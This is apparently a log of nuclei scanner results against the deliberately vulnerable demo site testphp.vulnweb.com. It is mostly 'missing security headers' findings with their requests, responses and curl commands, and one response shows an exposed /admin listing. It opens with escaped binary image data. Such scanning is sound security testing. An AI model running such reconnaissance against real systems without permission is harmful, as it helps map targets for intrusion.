ufffd\\u001c\\ufffd\\u001fO8a\\ufffd\\u0006F\\u0008\\ufffd{\\ufffd\\ufffdt}D\\ufffd\\ufffd\\ufffd5\\u0008\\ufffd\\ufffd0!\\ufffd\\ufffd\\u0012\\ufffd\\u000c9\\u001d\\ufffd\\ufffd\\ufffd2s\\ufffd5\\ufffdu\\r\\u003e\\ufffdloo\\ufffd\\ufffd]\\u001cY\\ufffd\\ufffd\\ufffd+.v\\ufffd\\u003e\\ufffd\\ufffd(@\\ufffd\\u0001 \\u0013\\ufffdL'\\ufffdt\\ufffd\\ufffd9Y\\ufffd\\ufffdTs\\ufffd\\ufffd5\\ufffd5l\\ufffd\\u000b\\ufffd\\\"m\\ufffd\\u001c\\ufffd\\ufffd\\ufffdp\\ufffd\\ufffd\\ufffdL\\u000c\\ufffd\\ufffd5\\ufffdo48\\ufffdNE;U%\\ufffd\\ufffd,\\ufffd\\ufffdm\\u0007h\\ufffd'\\ufffd@\\ufffdy\\u0002\\ufffd}R \\ufffd\\ufffd-\\ufffd\\ufffd\\ufffd\\u0000\\n\\ufffdpO\\u001f\\ufffd5\\ufffdU\\ufffd\\ufffdh\\ufffd\\ufffd\\u0015\\ufffd\\ufffdX\\ufffd\\ufffd\\ufffdN\\u003e\\ufffd\\ufffd㑭g\\u001704\\ufffd!V\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001fW\\ufffdO\\ufffd\\u0007\\ufffd\\ufffd\\u000bk\\t\\u0007\\ufffd\\ufffd\\ufffd%[Y\\ufffdC\\u0012\\ufffd\\ufffdA]Č\\u0010A\\ufffdG\\ufffd]\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\u001eL\\ufffd\\ufffdY\\ufffd9\\ufffdcX\\ufffd\\ufffdI!\\ufffd\\ufffdVF#*\\u0003.\\u00187\\u001fP\\u003c\\ufffd\\u0000\\t\\ufffd\\u003c\\ufffdՑ\\ufffdI}$\\ufffd\\\"\\ufffd\\ufffdv\\ufffd\\ufffd\\n\\ufffd\\ufffd\\u003e\\ufffdx\\ufffdd\\ufffd\\ufffd\\ufffd\\r\\ufffd\\u001f\\ufffd\\ufffdM\\ufffdu\\ufffd}+\\ufffd\\u0008 \\u001f\\ufffd\\u0003\\u0000\\ufffd\\ufffd\\ufffd\\u0019M\\ufffd'\\ufffd\\ufffdY#\\ufffdf%[\\ufffd[\\ufffd\\u003ej\\ufffd\\ufffd6\\ufffd\\u0007,4\\ufffdy\\u001elVh\\ufffdY-\\ufffd\\ufffdH\\ufffd\\ufffd\\u0019\\ufffd\\ufffdd\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffd\\ufffd\\u0003A4~夤{\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd}\\ufffd^\\ufffdۊ\\ufffdY\\u0011\\u001c\\ufffd\\ufffd\\u0005\\u0015\\ufffd\\ufffd\\u0014\\n\\ufffd\\ufffdp\\u0013S\\ufffdE\\u0015D\\u0003\\ufffdbO\\u003c\\ufffd\\ufffd\\u001b\\ufffd0e8 \\ufffdV1R*ѐ\\u0006\\ufffd\\ufffd\\ufffd.\\ufffdm\\u0004\\ufffdOs \\ufffd\\ufffd\\ufffds\\ufffd6H]\\ufffd\\ufffd`\\ufffd\\ufffd\\ufffd\\ufffd3U\\u000b1' \\ufffdx⽣\\u001c\\ufffd\\ufffd%\\ufffd\\ufffd\\ufffd?W\\ufffdg\\ufffd2\\ufffd\\\"F\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0003\\ufffd'\\ufffd\\ufffdO4v\\ufffdi\\ufffd1\\u0012_N\\ufffd\\ufffd=\\ufffd\\u0006\\ufffd\\ufffd\\u0004p\\u003e9?\\u001d\\ufffd+\\ufffd\\ufffd\\ufffdMoq\\u001c\\ufffd\\u0001d`ps\\ufffd\\ufffdW\\u0010\\ufffd\\ufffd\\ufffd\\ufffdsp=ûs\\ufffdO?\\ufffd\\ufffd?\\ufffd\\ufffd\\ufffdDlk+op\\ufffdt\\ufffd\\ufffdEw\\ufffdZ_\\ufffd\\ufffdݐ\\ufffd`VN\\u001c\\ufffd[ \\u000c\\ufffd\\u0015\\ufffdx\\ufffd\\ufffdrMd\\ufffdZD~\\ufffd\\ufffd3%\\ufffdO\\ufffd4\\ufffd7\\u003e\\ufffd3\\ufffd\\u0007\\ufffddc\\u0019$p\\u003cҶ\\ufffd\\ufffd\\ufffd\\ufffdxgc\\ufffd\\ufffdxQ\\ufffd\\u0001\\ufffd4Ţ\\ufffdq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdp#Q\\ufffd?[s\\ufffd\\u001cu\\ufffd\\ufffdk\\ufffdzkj\\ufffd:^%\\ufffdv\\u0019I7\\ufffd\\ufffdU\\ufffd\\\"\\ufffd{\\ufffdɍF\\ufffd\\ufffdBeKd}\\u0001\\ufffdF@a\\ufffd\\ufffd\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffdۙIPpA\\ufffd\\ufffdNWZ\\ufffd\\u0017\\ufffd\\ufffd\\u0015U}\\ufffdm\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\ufffdH\\r\\ufffdĆ\\u0004s\\ufffd?\\ufffd\\ufffdWv*\\u0016K\\ufffdܬ,#۵]\\ufffd\\ufffd\\ufffd9;A\\u0003\\ufffd9\\u0000.y'\\ufffdZuҩF\\u001a\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffdx34\\ufffd(\\ufffd\\ufffd\\ufffdC\\u0004;\\ufffd\\u0008\\ufffd`%m\\ufffd\\ufffd\\u0001\\ufffd\\ufffd\\ufffd#?I\\u000c\\u0000\\ufffdx\\u00002\\ufffd\\ufffd\\u0002=\\ufffd\\u0018\\ufffd\\u0005?$\\u001c\\ufffd\\ufffd\\ufffdx,e\\ufffdBM\\u0019u_i\\ufffd\\u001fKl\\ufffd\\u003e\\u0006_\\ufffd\\ufffd \\u000f\\ufffd\\ufffd]\\u0026\\ufffd\\ufffd\\ufffd\\ufffdH\\ufffdSsl\\ufffdtI\\u00260\\ufffd7\\u0001\\ufffd\\ufffd\\ufffd:\\u001eǒ9\\u0015\\u001d.\\ufffd\\ufffd3\\ufffdM\\ufffd\\ufffd\\ufffdC(\\ufffd\\ufffd\\ufffdLѣ}\\u003ev\\ufffd\\ufffd*\\ufffd1\\ufffd\\ufffd\\u003e\\ufffd\\u0007\\u0018$\\ufffd0r\\t\\ufffd~\\ufffdi\\u001d\\ufffd\\ufffdΰF\\ufffd2\\ufffd\\ufffd񗍷3`+\\u0012\\ufffd\\u0018\\ufffd\\ufffd\\u0001\\ufffdH\\ufffdHQ\\ufffd\\ufffdʉmqs\\ufffd\\ufffdgEf\\ufffd-\\ufffd\\ufffd\\u0007gh*3\\ufffd2\\ufffd\\u001b\\u0003\\ufffd\\ufffdq\\ufffd5\\ufffd\\ufffd\\ufffd\\ufffdM\\ufffd2-\\ufffd˔\\\"Ux\\ufffd,Y\\ufffd\\u0000\\ufffdv\\n\\ufffd\\ufffd\\u001c\\u000e2AbR\\ufffd\\ufffd6\\ufffdJ\\ufffd\\ufffd\\ufffd=\\ufffd\\ufffd\\ufffd[\\ufffd7\\ufffd\\u0014Q]\\ufffd\\u000f\\u0014T\\ufffd*\\ufffd\\u000c(\\ufffd\\ufffdt\\u0002EM@\\ufffd\\u0015D\\u0002jS\\ufffd\\ufffdEd\\ufffdI\\ufffd\\ufffd\\ufffd32\\ufffd\\ufffd\\ufffdb=\\u001a\\ufffd\\u001a\\u001cV\\ufffd)\\ufffd\\ufffd\\ufffd\\u0001\\ufffd\\t?\\ufffdo۱\\u0015\\u001a5\\ufffd\\ufffd\\ufffdXZU\\ufffdp$3\\u001e8\\u001f\\ufffd\\\\\\ufffd\\u0002x\\ufffdY\\ufffd\\ufffd\\ufffd\\ufffd12\\ufffd\\ufffd\\u0003r\\ufffd?\\ufffd\\ufffdԳ\\ufffd\\ufffd8=ؼ\\ufffdՔ\\ufffde9\\u0004v*\\ufffd\\ufffd\\ufffd,\\u0011f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd8l6d!rz\\u0019$*\\ufffd\\ufffd\\u0001\\ufffd+oC\\ufffd\\ufffd\\ufffd޳J\\ufffdy\\u0002'\\ufffd\\ufffd(9w\\ufffd\\ufffd\\u0007\\ufffd\\u001f\\ufffd\\ufffd\\u0004\\ufffd[S\\ufffd\\u0016{d\\ufffd\\ufffd\\ufffdtL^!\\ufffd\\u0014ۺ \\ufffd;X\\ufffdCt\\ufffd#\\u001e;\\ufffd'\\ufffd\\ufffdk\\ufffd\\ufffd\\ufffd\\ufffduHu\\u001cn\\ufffd\\ufffd4n\\ufffdb\\u000b\\u0013\\ufffd9\\ufffd!o(H\\ufffdV$\\ufffdg\\ufffd!\\ufffd0\\u0007q\\u0019\\ufffd\\ufffd}D\\ufffd:\\ufffd\\ufffd\\u0008w\\ufffdVT`Tgk\\u00021\\ufffd\\u001f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdrj\\ufffd\\ufffdk\\ufffd'\\ufffd\\ufffdK\\u0016f\\u0003h\\ufffd\\ufffd\\ufffd\\ufffd[J\\ufffdv\\ufffd\\u001bk\\ufffd\\ufffd \\ufffd,b\\u0011Š\\ufffd\\u0026a\\ufffd\\ufffd\\ufffd\\ufffdX\\u0012\\ufffd2\\ufffdI\\ufffd\\ufffd\\u0002\\ufffd\\ufffdT|\\u003e\\ufffd\\ufffdi4\\ufffd\\ufffd\\ufffd\\ufffdl\\ufffd\\ufffd\\n\\ufffd\\ufffd\\ufffd;eܜu\\ufffd\\ufffd\\ufffd\\u0000|\\ufffdE\\ufffd\\ufffdܶ\\u0000$\\ufffdv\\ufffd\\u0001$\\ufffdN\\u0007\\u0003\\ufffdO\\ufffd\\ufffd}Ci\\u001a\\u0004\\ufffd\\ufffd9\\ufffdl2ZE*I?lq\\ufffd羱Ks[\\ufffd\\u0014\\ufffdӴvq\\ufffd\\ufffdz\\ufffd\\ufffdȩǂMcc\\ufffdQE\\u0015ć\\n\\ufffd(\\ufffd\\ufffdI4\\n(\\ufffd@\\u0026\\ufffdE\\u0015X\\ufffd\\ufffd\\ufffd\\ufffdO\\ufffd\\ufffdЬo4幞6i\\\"i\\u001c\\ufffd\\\\H\\u0001L+\\u000f\\ufffdOX\\u003c\\ufffd\\ufffd\\n+Zڎ\\ufffdB\\ufffdȾ\\ufffda@\\u0019\\ufffdx\\ufffd\\u001d\\n\\u0008澉%@\\ufffd͂\\ufffd\\ufffd)\\ufffd\\ufffd\\ufffd\\u000e\\ufffdV\\ufffdh\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0011\\ufffd\\ufffd!=\\ufffd\\u000c\\u001e?\\ufffd\\ufffd\\ufffd\\ufffdwcmh\\ufffd\\ufffd\\ufffd\\r\\ufffd6|1\\u003c}L\\u0015G\\ufffd@\\n\\u0007\\ufffd\\u0014Q^}\\ufffd~fs\\ufffd\\ufffd!\\ufffd\\u0005\\ufffd\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffdيX\\ufffd\\ufffd\\ufffd\\ufffdWyB\\ufffd\\u003c\\ufffd\\ufffd=\\u001c\\ufffd\\u0019\\ufffd\\ufffdj\\ufffdԒ46dE\\ufffdW\\ufffd#*\\ufffd\\u0002D\\ufffds\\ufffd\\ufffd~\\ufffd\\u001c\\ufffdsE\\u0015\\ufffd\\ufffdb\\ufffd\\ufffd7-\\ufffdI\\ufffd\\\"\\ufffd\\u00126\\ufffd\\ufffdA\\u0006\\ufffd4]\\ufffd\\ufffd]\\u001b\\ufffd\\ufffd5\\ufffd\\u0008cx\\ufffd\\ufffd1\\ufffdъ\\ufffd\\u001c\\ufffdt\\ufffd\\ufffdA\\ufffdS\\ufffd\\ufffd\\ufffdEz\\u003e3\\ufffd\\u000b\\ufffd%|\\ufffd\\ufffd\\ufffdMSF\\ufffd\\ufffd\\ufffd\\n\\ufffdI\\ufffdrG\\ufffd\\ufffd1\\ufffdI\\ufffd:żp\\ufffd\\ufffdl\\u0017r\\ufffd\\u0017\\u0001\\ufffd\\ufffd\\u0002\\ufffd\\u0015\\ufffd\\u001fO\\u0003\\ufffd\\ufffd\\u0001\\ufffd\\u0002\\ufffd(\\ufffdj\\ufffdK\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:05.871947812Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/1.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/admin\",\"path\":\"/admin\",\"matched-at\":\"http://testphp.vulnweb.com/admin/\",\"request\":\"GET /admin HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:35 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /admin/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /admin/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"create.sql\\\"\\u003ecreate.sql\\u003c/a\\u003e 11-May-2011 10:27 523\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:06.244463881Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36' 'http://testphp.vulnweb.com/admin'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:06.244460278Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop\",\"path\":\"/Mod_Rewrite_Shop\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/\",\"request\":\"GET /Mod_Rewrite_Shop HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003cdiv id=\\\"content\\\"\\u003e\\r\\n\\t\\u003cdiv class='product'\\u003e\\u003ctable\\u003e\\u003ctr\\u003e\\u003ctd width='180px'\\u003e\\u003cimg src='images/1.jpg'\\u003e\\u003c/td\\u003e\\u003ctd width='400px'\\u003e\\u003ca href='Details/network-attached-storage-dlink/1/'\\u003eNetwork Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd width='50px' bgcolor='#F8F8F8'\\u003e\\u003ca href='Details/network-attached-storage-dlink/1/'\\u003ePrice\\u003cbr\\u003e359 \\u0026euro;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/table\\u003e\\u003c/tr\\u003e\\u003c/div\\u003e\\u003cdiv class='product'\\u003e\\u003ctable\\u003e\\u003ctr\\u003e\\u003ctd width='180px'\\u003e\\u003cimg src='images/2.jpg'\\u003e\\u003c/td\\u003e\\u003ctd width='400px'\\u003e\\u003ca href='Details/web-camera-a4tech/2/'\\u003eWeb Camera A4Tech PK-335E\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd width='50px' bgcolor='#F8F8F8'\\u003e\\u003ca href='Details/web-camera-a4tech/2/'\\u003ePrice\\u003cbr\\u003e10 \\u0026euro;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/table\\u003e\\u003c/tr\\u003e\\u003c/div\\u003e\\u003cdiv class='product'\\u003e\\u003ctable\\u003e\\u003ctr\\u003e\\u003ctd width='180px'\\u003e\\u003cimg src='images/3.jpg'\\u003e\\u003c/td\\u003e\\u003ctd width='400px'\\u003e\\u003ca href='Details/color-printer/3/'\\u003eLaser Color Printer HP LaserJet M551dn, A4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd width='50px' bgcolor='#F8F8F8'\\u003e\\u003ca href='Details/color-printer/3/'\\u003ePrice\\u003cbr\\u003e812 \\u0026euro;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/table\\u003e\\u003c/tr\\u003e\\u003c/div\\u003e\\u003c/div\\u003e\\r\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:06.244513052Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:06.620880554Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/cgi-bin/status\",\"path\":\"/cgi-bin/status\",\"matched-at\":\"http://testphp.vulnweb.com/cgi-bin/status\",\"request\":\"GET /cgi-bin/status HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=iso-8859-1\\r\\nDate: Wed, 13 Nov 2024 02:41:39 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//IETF//DTD HTML 2.0//EN\\\"\\u003e\\n\\u003chtml\\u003e\\u003chead\\u003e\\n\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\n\\u003c/head\\u003e\\u003cbody\\u003e\\n\\u003ch1\\u003eNot Found\\u003c/h1\\u003e\\n\\u003cp\\u003eThe requested URL was not found on this server.\\u003c/p\\u003e\\n\\u003chr\\u003e\\n\\u003caddress\\u003eApache/2.4.46 (Ubuntu) Server at localhost Port 8000\\u003c/address\\u003e\\n\\u003c/body\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:06.620864593Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36' 'http://testphp.vulnweb.com/cgi-bin/status'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: 